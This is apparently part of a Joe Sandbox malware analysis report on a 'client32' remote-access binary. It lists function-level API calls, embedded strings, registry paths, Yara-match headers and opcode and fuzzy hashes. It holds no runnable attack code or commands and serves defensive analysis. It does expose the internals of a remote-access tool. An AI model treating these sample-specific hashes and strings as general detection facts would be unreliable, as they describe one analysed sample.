                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 11146648
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11146660
                                                                              • CloseHandle.KERNEL32(?), ref: 11146673
                                                                              • CloseHandle.KERNEL32(?), ref: 1114667C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateFile$FolderHandlePath_memsetwsprintf$ChangeFindModuleNameNotificationObjectOpenPlayProcessSingleSoundVersionWait_strncpy
                                                                              • String ID: %s %s$%sPlaySound.exe$D
                                                                              • API String ID: 409290027-2983100991
                                                                              • Opcode ID: 7102f52d56ead8846a781198aabe43335b826310a085ff073572e0cd4b1e8f60
                                                                              • Instruction ID: f12361923010530fa1f4d3c2fecabc411f8d2defed1a04cf58563ea8446b9f82
                                                                              • Opcode Fuzzy Hash: 7102f52d56ead8846a781198aabe43335b826310a085ff073572e0cd4b1e8f60
                                                                              • Instruction Fuzzy Hash: 1531B875A4022CA7EB24DB60DD41FEAB37CEB48708F100599FA18A75C0DBB1AB40CB94
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • GetVersionExA.KERNEL32(?,View,*NoHideFEP,00000000,00000000,00000001), ref: 1112433F
                                                                              • InterlockedExchange.KERNEL32(111F19B4,00000001), ref: 11124365
                                                                              • CreateWindowExA.USER32(00000000,button,11195264,50000000,FFFFEC78,00000000,00000014,0000000E,?,00000001,00000000,00000000), ref: 111243AB
                                                                              • SetWindowLongA.USER32(00000000,000000FC,11124260), ref: 111243CB
                                                                              • SetFocus.USER32(00000000), ref: 111243E2
                                                                              • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 111243FC
                                                                              • DestroyWindow.USER32(00000000), ref: 11124412
                                                                              • InterlockedExchange.KERNEL32(111F19B4,00000000), ref: 11124429
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ExchangeInterlockedLong$CreateDestroyFocusVersion__wcstoi64
                                                                              • String ID: *NoHideFEP$View$button
                                                                              • API String ID: 1610953178-1502386645
                                                                              • Opcode ID: 3df1cd25a3e99283e66dc0eb30b6fc3792aa7aceeb4f9b7b3075ab98f919e26e
                                                                              • Instruction ID: e7f43078c421523e46d189802bbe7ea8140fa8570dcc46dc3c934ff96bec0ddb
                                                                              • Opcode Fuzzy Hash: 3df1cd25a3e99283e66dc0eb30b6fc3792aa7aceeb4f9b7b3075ab98f919e26e
                                                                              • Instruction Fuzzy Hash: 4831C134686266EFE724CF61DEC4B66FBB8BB0530DF940228F92593984EB70A504CB50
                                                                              APIs
                                                                              • GlobalLock.KERNEL32(00000000,00000000,00000000,?,?,110F0F5F,00000000,00000000,00000000), ref: 110F0195
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: GlobalLock
                                                                              • String ID: ..\CTL32\pcibmp.cpp$lpDIBHdr
                                                                              • API String ID: 2848605275-3862004634
                                                                              • Opcode ID: 4a487efc62b0167be38a2ef6a589ff5fd5c2a3bcb33af42fea8e612d83ec71b4
                                                                              • Instruction ID: 48b537532a5f9d411629d31a319caae8f618a47305d54306625b328f3ccba6c9
                                                                              • Opcode Fuzzy Hash: 4a487efc62b0167be38a2ef6a589ff5fd5c2a3bcb33af42fea8e612d83ec71b4
                                                                              • Instruction Fuzzy Hash: 9F210876B402197BD711CEA5AC89FDBB7ADEB8926AF000175FD28C7244EA21D90087E5
                                                                              APIs
                                                                              • GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11138283
                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                              • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                              • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                              • _memset.LIBCMT ref: 111382F7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc$Version_memset
                                                                              • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                              • API String ID: 1659045089-3162170060
                                                                              • Opcode ID: b43d23eca00fc98279872c74fba5cd571594f629bf43370f3fb923d7744f4274
                                                                              • Instruction ID: 6bea6a721b48e0bd7045a1c1c27de9b3bedd913fe245b2b434f6356e9170b374
                                                                              • Opcode Fuzzy Hash: b43d23eca00fc98279872c74fba5cd571594f629bf43370f3fb923d7744f4274
                                                                              • Instruction Fuzzy Hash: 5A216A34F00319ABF7109BB1ED84FDAFBA89F89799F000125ED44A7388DAB5D900C756
                                                                              APIs
                                                                              • CreateSolidBrush.GDI32(?), ref: 1100306D
                                                                              • GetStockObject.GDI32(00000007), ref: 11003089
                                                                              • SelectObject.GDI32(?,00000000), ref: 1100309A
                                                                              • SelectObject.GDI32(?,?), ref: 110030A7
                                                                              • InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
                                                                              • GetSysColor.USER32(00000004), ref: 110030EB
                                                                              • SetBkColor.GDI32(?,00000000), ref: 110030F6
                                                                              • Rectangle.GDI32(?,?,?,?,?), ref: 11003110
                                                                              • SelectObject.GDI32(?,?), ref: 1100311E
                                                                              • SelectObject.GDI32(?,?), ref: 11003128
                                                                              • DeleteObject.GDI32(?), ref: 1100312E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                              • String ID:
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Window$_memmove
                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h$sending %d pending packets to id=%d$sending %d pending64 packets to id=%d
                                                                              APIs
                                                                              • CountClipboardFormats.USER32 ref: 11033091
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                              • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                              • GetLastError.KERNEL32 ref: 110331BF
                                                                              • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                              • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
                                                                              • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                              APIs
                                                                              • SetPropA.USER32(?,AB86ACF8,?), ref: 110CC1FB
                                                                              • GetCurrentThreadId.KERNEL32 ref: 110CC20F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GetPropA.USER32(?), ref: 110CC241
                                                                              • wsprintfA.USER32 ref: 110CC26B
                                                                              • RemovePropA.USER32(?,00000110), ref: 110CC2B2
                                                                              • DestroyWindow.USER32(?), ref: 110CC2EE
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Prop$wsprintf$CurrentDestroyErrorExitLastMessageProcessRemoveThreadWindow
                                                                              • String ID: ..\ctl32\nsmdlg.cpp$cp=%x, attached=%x, msg=x%x, wP=x%x, lP=x%x$m_aProp$p->m_attached == NULL
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _memset_strncat_strncpy$_calloc
                                                                              • String ID: Drivers$PrintCapture$Printer
                                                                              APIs
                                                                              • GetMenuItemCount.USER32 ref: 1101F2B5
                                                                              • _memset.LIBCMT ref: 1101F2D8
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F2F6
                                                                              • _free.LIBCMT ref: 1101F305
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _free.LIBCMT ref: 1101F30E
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F32D
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F33B
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
                                                                              • String ID: $0$UndoOwnerDraw
                                                                              APIs
                                                                              Strings
                                                                              • IsMember(%ls, %ls) ret %d, took %u ms, xrefs: 110466F6
                                                                              • RecIsMember(%ls, %ls) ret %d, took %u ms, xrefs: 11046754
                                                                              Similarity
                                                                              • API ID: CountTick$FreeString
                                                                              • String ID: IsMember(%ls, %ls) ret %d, took %u ms$RecIsMember(%ls, %ls) ret %d, took %u ms
                                                                              APIs
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110C01F2
                                                                              • GetClassNameA.USER32(?,?,00000040), ref: 110C0228
                                                                              • TranslateAcceleratorA.USER32(?,?,?), ref: 110C032B
                                                                              • TranslateMessage.USER32(?), ref: 110C0339
                                                                              • DispatchMessageA.USER32(?), ref: 110C0343
                                                                              • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110C0363
                                                                              Strings
                                                                              • HasListener(), xrefs: 110C0286
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\WBObject.h, xrefs: 110C0281
                                                                              • Internet Explorer_Server, xrefs: 110C022E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Translate$AcceleratorClassDispatchName
                                                                              • String ID: HasListener()$Internet Explorer_Server$e:\nsmsrc\nsm\1210\1210f\ctl32\WBObject.h
                                                                              • API String ID: 2790452592-1312810806
                                                                              • Opcode ID: a299c0a341d7359eb60e01caba3f66fa6322f248e60fac38c817ccec7eac8837
                                                                              • Instruction ID: 936b2eed32dfe800ad467d363562b9c3f6b2b04524ed739118aa387b7ad975e3
                                                                              • Opcode Fuzzy Hash: a299c0a341d7359eb60e01caba3f66fa6322f248e60fac38c817ccec7eac8837
                                                                              • Instruction Fuzzy Hash: 17519179E002599FCB04DFE9C8C0EAEB7BAFB89708B1085ADE5159B254E730A944CF50
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110513F9
                                                                              • CloseHandle.KERNEL32(?,Client,UserAcknowledge,00000000,00000000), ref: 110514DB
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle__wcstoi64_memset
                                                                              • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                              • API String ID: 510078033-311296318
                                                                              • Opcode ID: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                              • Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
                                                                              • Opcode Fuzzy Hash: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                              • Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,AB86ACF8,?,?), ref: 1105A559
                                                                              • EnterCriticalSection.KERNEL32(?,?,?), ref: 1105A5BE
                                                                              • timeGetTime.WINMM(?,?), ref: 1105A5EC
                                                                              • GetTickCount.KERNEL32 ref: 1105A626
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?), ref: 1105A69A
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?), ref: 1105A6B4
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?), ref: 1105A6D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$CountObjectSingleTickTimeWaittime
                                                                              • String ID: _License$maxslaves
                                                                              • API String ID: 3724810986-253336860
                                                                              • Opcode ID: 47acf8a46b654237af2362819ba01079215634d33959dcd664a85182bc47307d
                                                                              • Instruction ID: 218b07b8e86cb1b4b212646cc2ee7e6510c65d0581f7dc775b968cb85b8a58a4
                                                                              • Opcode Fuzzy Hash: 47acf8a46b654237af2362819ba01079215634d33959dcd664a85182bc47307d
                                                                              • Instruction Fuzzy Hash: AD519175E01716DFDB85CFA5C984AAAF7F8FB48708B004669E422D7644E730E990CFA0
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?,AB86ACF8,00000000,00000000,74DF23A0,1105A377,00000000,00000000), ref: 1105A128
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 1105A24A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,0002001F,?), ref: 1105A1DD
                                                                              • RegDeleteValueA.ADVAPI32(?,?), ref: 1105A1FD
                                                                              • RegCloseKey.ADVAPI32(?), ref: 1105A207
                                                                              • SetEvent.KERNEL32(?), ref: 1105A240
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CloseDeleteEnterErrorEventExitLastLeaveMessageOpenProcessValuewsprintf
                                                                              • String ID: CltReconn.cpp$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect$gMain.pReconnThread
                                                                              • API String ID: 1302350719-2578778249
                                                                              • Opcode ID: b86f74dc15627503e7c4bd94685024e8bca033cd23369bedd85c5e72bf16c997
                                                                              • Instruction ID: 1f49fd18d6206b038cc207d8770ec6d77d753ef3336a6f753e93b5d574fca70b
                                                                              • Opcode Fuzzy Hash: b86f74dc15627503e7c4bd94685024e8bca033cd23369bedd85c5e72bf16c997
                                                                              • Instruction Fuzzy Hash: 97412975D0072AEFD781CFA4CCC1AAABBA5FB05754F108269E926D7640D736E840CF90
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick
                                                                              • String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
                                                                              • API String ID: 536389180-1339850372
                                                                              • Opcode ID: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                              • Instruction ID: 7a2480a0f38ec62df9d6165c4879ba51ca1346fdc5c877313ede350298642e4b
                                                                              • Opcode Fuzzy Hash: b0d48e285380544e5a04f23f59acccb283078a85027adb73250184a2610d4c83
                                                                              • Instruction Fuzzy Hash: 8541CD75E022359BE712CFE1D981BA9F7E4FB44348F10056AE83597284FB30E680CBA1
                                                                              APIs
                                                                                • Part of subcall function 11001F80: FindWindowA.USER32(Progman,00000000), ref: 11001FA9
                                                                                • Part of subcall function 11001F80: GetWindowThreadProcessId.USER32(00000000,?), ref: 11001FB7
                                                                                • Part of subcall function 11001F80: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11001FCB
                                                                                • Part of subcall function 11001F80: GetVersionExA.KERNEL32(?), ref: 11001FE4
                                                                                • Part of subcall function 11001F80: OpenProcessToken.ADVAPI32(00000000,0002000B,00000000), ref: 11002000
                                                                                • Part of subcall function 11001F80: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 11002011
                                                                                • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 11002028
                                                                                • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 1100202F
                                                                              • _memset.LIBCMT ref: 11004313
                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 110043C6
                                                                              • GetSaveFileNameA.COMDLG32(00000058), ref: 110043CF
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 11004453
                                                                              • RevertToSelf.ADVAPI32 ref: 11004455
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Process$CloseEnableFileFolderHandleNameOpenPath$FindImpersonateLoggedModuleRevertSaveSelfThreadTokenUserVersion_memset
                                                                              • String ID: BMP$X$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 3949878547-2539113696
                                                                              • Opcode ID: ce1c97cf7a7aa21e6251f802e3d21045b55600e3d1615c3dd84d8967101525df
                                                                              • Instruction ID: 1a06fff4f71d161ae854b0cf7e53d0be396d8369705791c075994b803ddd0564
                                                                              • Opcode Fuzzy Hash: ce1c97cf7a7aa21e6251f802e3d21045b55600e3d1615c3dd84d8967101525df
                                                                              • Instruction Fuzzy Hash: E441B3B4E003199BEB21DF60CC41FDAB7F4EB08748F0145A9E519AB280DBB5AA44CF54
                                                                              APIs
                                                                              • FindWindowA.USER32(NSMW16Class,00000000), ref: 1103D2E4
                                                                              • SendMessageA.USER32(00000000,0000004A,00040270,?), ref: 1103D313
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
                                                                              • CloseHandle.KERNEL32(?), ref: 1103D364
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseFileFindHandleMessageSendWindowWrite
                                                                              • String ID: CLTCONN.CPP$NSMW16Class
                                                                              • API String ID: 4104200039-3790257117
                                                                              • Opcode ID: 7bae25e5ec6ac12795ee0301b5ed4f221613fcdb06e7094a7561e2cb570cb440
                                                                              • Instruction ID: 7413f3f2c5586e26beac36a23cabaf74cb1d99cfb277255675335e3274ed5d18
                                                                              • Opcode Fuzzy Hash: 7bae25e5ec6ac12795ee0301b5ed4f221613fcdb06e7094a7561e2cb570cb440
                                                                              • Instruction Fuzzy Hash: AC418E75A0020AAFE715CFA0D884BDEF7ACBB84719F008659F85997240DB74BA54CB91
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00000000), ref: 1113F116
                                                                              • MessageBeep.USER32(00000000), ref: 1113F1C9
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,00000000,00000000), ref: 1113F1F4
                                                                              • UpdateWindow.USER32(?), ref: 1113F21B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
                                                                              • String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 490496107-2775872530
                                                                              • Opcode ID: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                              • Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
                                                                              • Opcode Fuzzy Hash: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                              • Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52
                                                                              APIs
                                                                              • GetClassInfoA.USER32(11000000,NSMStatsWindow,?), ref: 11140399
                                                                              • GetStockObject.GDI32(00000000), ref: 111403D2
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 111403EA
                                                                              • RegisterClassA.USER32(?), ref: 111403FE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GlobalAddAtomA.KERNEL32(NSMStatsWindow), ref: 11140425
                                                                              • CreateWindowExA.USER32(00000088,NSMStatsWindow,Stats,80C80000,00000000,00000000,00000000,00000000,00000000,00000000,11000000,00000000), ref: 1114045F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Class$AtomCreateCursorErrorExitGlobalInfoLastLoadMessageObjectProcessRegisterStockWindowwsprintf
                                                                              • String ID: NSMStatsWindow$Stats$UI.CPP
                                                                              • API String ID: 2264362397-3221558550
                                                                              • Opcode ID: 4eb6c5bb774bbad3e3a68f4fb1ddf214a4a8ecc8339067d6f45288208c44a247
                                                                              • Instruction ID: bebd7d2a7b3372845581ea12ef928e6e0fe2e2f0ea6b207ad6945ed1a953ef7c
                                                                              • Opcode Fuzzy Hash: 4eb6c5bb774bbad3e3a68f4fb1ddf214a4a8ecc8339067d6f45288208c44a247
                                                                              • Instruction Fuzzy Hash: 5B210CB5E0221AAFC744DFE59984BEEFBF8BB08304F10412AE529F2644E7305600CB99
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,11128B9C,?,?,111291FC,AB86ACF8,?,?,?,00000000,1118BADE,000000FF,?,?), ref: 1112806B
                                                                              • GetProcAddress.KERNEL32(00000000,CancelIo), ref: 1112807B
                                                                              • SetLastError.KERNEL32(0000007F,?,111CD988), ref: 111280A7
                                                                              • SetLastError.KERNEL32(0000007E,?,111CD988), ref: 111280CB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$AddressHandleModuleProc
                                                                              • String ID: !"CancelIo NOT FOUND in kernel32.dll!"$!"kernel32.dll NOT FOUND!"$..\nt\vsmartcrd\public\SmartcardDevice.cpp$CancelIo$kernel32.dll
                                                                              • API String ID: 1762409328-2662562804
                                                                              • Opcode ID: acfe7ee854dc3e558664093ce5ef8a73ca71c36a9a436bf1fa4c2d7b7436c370
                                                                              • Instruction ID: cda793e3d14a74608214cb0dea4bb6fde32d3a192c59d564bbd0a57c488a8cc7
                                                                              • Opcode Fuzzy Hash: acfe7ee854dc3e558664093ce5ef8a73ca71c36a9a436bf1fa4c2d7b7436c370
                                                                              • Instruction Fuzzy Hash: 12F0E97578023C77EE2066F67E06FD9FB599B01A9AF400031FA2EE1981E9619400C3D9
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 110351E0
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                              • _memmove.LIBCMT ref: 11035267
                                                                              • _memmove.LIBCMT ref: 1103528B
                                                                              • _memmove.LIBCMT ref: 110352C5
                                                                              • _memmove.LIBCMT ref: 110352E1
                                                                              • std::exception::exception.LIBCMT ref: 1103532B
                                                                              • __CxxThrowException@8.LIBCMT ref: 11035340
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                              • String ID: deque<T> too long
                                                                              • API String ID: 827257264-309773918
                                                                              • Opcode ID: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                              • Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
                                                                              • Opcode Fuzzy Hash: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                              • Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 11019370
